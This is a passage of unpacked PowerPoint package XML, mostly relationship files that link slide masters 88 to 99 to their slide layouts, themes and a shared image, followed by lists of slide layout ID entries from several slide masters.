Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout870.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout861.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout879.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout878.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout877.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout876.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout875.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout874.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout873.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout872.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme88.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout880.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout871.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster89.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout889.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout888.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout887.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout886.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout885.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout884.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout883.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout882.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme89.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout890.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout881.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout89.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout88.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout87.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout86.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout85.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout84.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout83.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout82.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme9.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout90.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout81.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster90.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout899.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout898.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout897.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout896.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout895.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout894.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout893.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout892.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme90.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout900.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout891.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster91.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout909.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout908.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout907.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout906.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout905.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout904.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout903.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout902.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme91.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout910.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout901.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout919.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout918.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout917.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout916.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout915.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout914.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout913.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout912.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme92.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout920.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout911.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster93.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout929.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout928.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout927.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout926.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout925.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout924.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout923.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout922.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme93.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout930.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout921.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster94.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout939.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout938.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout937.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout936.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout935.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout934.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout933.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout932.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme94.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout940.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout931.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster95.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout949.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout948.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout947.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout946.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout945.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout944.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout943.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout942.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme95.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout950.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout941.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout959.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout958.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout957.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout956.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout955.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout954.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout953.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout952.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme96.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout960.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout951.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout969.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout968.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout967.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout966.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout965.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout964.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout963.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout962.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme97.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout970.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout961.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster98.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout979.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout978.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout977.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout976.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout975.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout974.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout973.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout972.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme98.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout980.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout971.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster99.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout989.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout988.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout987.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout986.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout985.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout984.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout983.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout982.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme99.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout990.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout981.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0.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3748" r:id="rId1"/>
    <p:sldLayoutId id="2147483749" r:id="rId2"/>
    <p:sldLayoutId id="2147483750" r:id="rId3"/>
    <p:sldLayoutId id="2147483751" r:id="rId4"/>
    <p:sldLayoutId id="2147483752" r:id="rId5"/>
    <p:sldLayoutId id="2147483753" r:id="rId6"/>
    <p:sldLayoutId id="2147483754" r:id="rId7"/>
    <p:sldLayoutId id="2147483755" r:id="rId8"/>
    <p:sldLayoutId id="2147483756" r:id="rId9"/>
    <p:sldLayoutId id="2147483757"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00.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4738" r:id="rId1"/>
    <p:sldLayoutId id="2147484739" r:id="rId2"/>
    <p:sldLayoutId id="2147484740" r:id="rId3"/>
    <p:sldLayoutId id="2147484741" r:id="rId4"/>
    <p:sldLayoutId id="2147484742" r:id="rId5"/>
    <p:sldLayoutId id="2147484743" r:id="rId6"/>
    <p:sldLayoutId id="2147484744" r:id="rId7"/>
    <p:sldLayoutId id="2147484745" r:id="rId8"/>
    <p:sldLayoutId id="2147484746" r:id="rId9"/>
    <p:sldLayoutId id="2147484747"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01.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4749" r:id="rId1"/>
    <p:sldLayoutId id="2147484750" r:id="rId2"/>
    <p:sldLayoutId id="2147484751" r:id="rId3"/>
    <p:sldLayoutId id="2147484752" r:id="rId4"/>
    <p:sldLayoutId id="2147484753" r:id="rId5"/>
    <p:sldLayoutId id="2147484754" r:id="rId6"/>
    <p:sldLayoutId id="2147484755" r:id="rId7"/>
    <p:sldLayoutId id="2147484756" r:id="rId8"/>
    <p:sldLayoutId id="2147484757" r:id="rId9"/>
    <p:sldLayoutId id="2147484758"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02.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4760" r:id="rId1"/>
    <p:sldLayoutId id="2147484761" r:id="rId2"/>
    <p:sldLayoutId id="2147484762" r:id="rId3"/>
    <p:sldLayoutId id="2147484763" r:id="rId4"/>
    <p:sldLayoutId id="2147484764" r:id="rId5"/>
    <p:sldLayoutId id="2147484765" r:id="rId6"/>
    <p:sldLayoutId id="2147484766" r:id="rId7"/>
    <p:sldLayoutId id="2147484767" r:id="rId8"/>
    <p:sldLayoutId id="2147484768" r:id="rId9"/>
    <p:sldLayoutId id="2147484769"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03.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4771" r:id="rId1"/>
    <p:sldLayoutId id="2147484772" r:id="rId2"/>
    <p:sldLayoutId id="2147484773" r:id="rId3"/>
    <p:sldLayoutId id="2147484774" r:id="rId4"/>
    <p:sldLayoutId id="2147484775" r:id="rId5"/>
    <p:sldLayoutId id="2147484776" r:id="rId6"/>
    <p:sldLayoutId id="2147484777" r:id="rId7"/>
    <p:sldLayoutId id="2147484778" r:id="rId8"/>
    <p:sldLayoutId id="2147484779" r:id="rId9"/>
    <p:sldLayoutId id="2147484780"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04.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4782" r:id="rId1"/>
    <p:sldLayoutId id="2147484783" r:id="rId2"/>
    <p:sldLayoutId id="2147484784" r:id="rId3"/>
    <p:sldLayoutId id="2147484785" r:id="rId4"/>
    <p:sldLayoutId id="2147484786" r:id="rId5"/>
    <p:sldLayoutId id="2147484787" r:id="rId6"/>
    <p:sldLayoutId id="2147484788" r:id="rId7"/>
    <p:sldLayoutId id="2147484789" r:id="rId8"/>
    <p:sldLayoutId id="2147484790" r:id="rId9"/>
    <p:sldLayoutId id="2147484791"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05.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4793" r:id="rId1"/>
    <p:sldLayoutId id="2147484794" r:id="rId2"/>
    <p:sldLayoutId id="2147484795" r:id="rId3"/>
    <p:sldLayoutId id="2147484796" r:id="rId4"/>
    <p:sldLayoutId id="2147484797" r:id="rId5"/>
    <p:sldLayoutId id="2147484798" r:id="rId6"/>
    <p:sldLayoutId id="2147484799" r:id="rId7"/>
    <p:sldLayoutId id="2147484800" r:id="rId8"/>
    <p:sldLayoutId id="2147484801" r:id="rId9"/>
    <p:sldLayoutId id="2147484802"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06.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4804" r:id="rId1"/>
    <p:sldLayoutId id="2147484805" r:id="rId2"/>
    <p:sldLayoutId id="2147484806" r:id="rId3"/>
    <p:sldLayoutId id="2147484807" r:id="rId4"/>
    <p:sldLayoutId id="2147484808" r:id="rId5"/>
    <p:sldLayoutId id="2147484809" r:id="rId6"/>
    <p:sldLayoutId id="2147484810" r:id="rId7"/>
    <p:sldLayoutId id="2147484811" r:id="rId8"/>
    <p:sldLayoutId id="2147484812" r:id="rId9"/>
    <p:sldLayoutId id="2147484813"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07.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4815" r:id="rId1"/>
    <p:sldLayoutId id="2147484816" r:id="rId2"/>
    <p:sldLayoutId id="2147484817" r:id="rId3"/>
    <p:sldLayoutId id="2147484818" r:id="rId4"/>
    <p:sldLayoutId id="2147484819" r:id="rId5"/>
    <p:sldLayoutId id="2147484820" r:id="rId6"/>
    <p:sldLayoutId id="2147484821" r:id="rId7"/>
    <p:sldLayoutId id="2147484822" r:id="rId8"/>
    <p:sldLayoutId id="2147484823" r:id="rId9"/>
    <p:sldLayoutId id="2147484824"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08.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4826" r:id="rId1"/>
    <p:sldLayoutId id="2147484827" r:id="rId2"/>
    <p:sldLayoutId id="2147484828" r:id="rId3"/>
    <p:sldLayoutId id="2147484829" r:id="rId4"/>
    <p:sldLayoutId id="2147484830" r:id="rId5"/>
    <p:sldLayoutId id="2147484831" r:id="rId6"/>
    <p:sldLayoutId id="2147484832" r:id="rId7"/>
    <p:sldLayoutId id="2147484833" r:id="rId8"/>
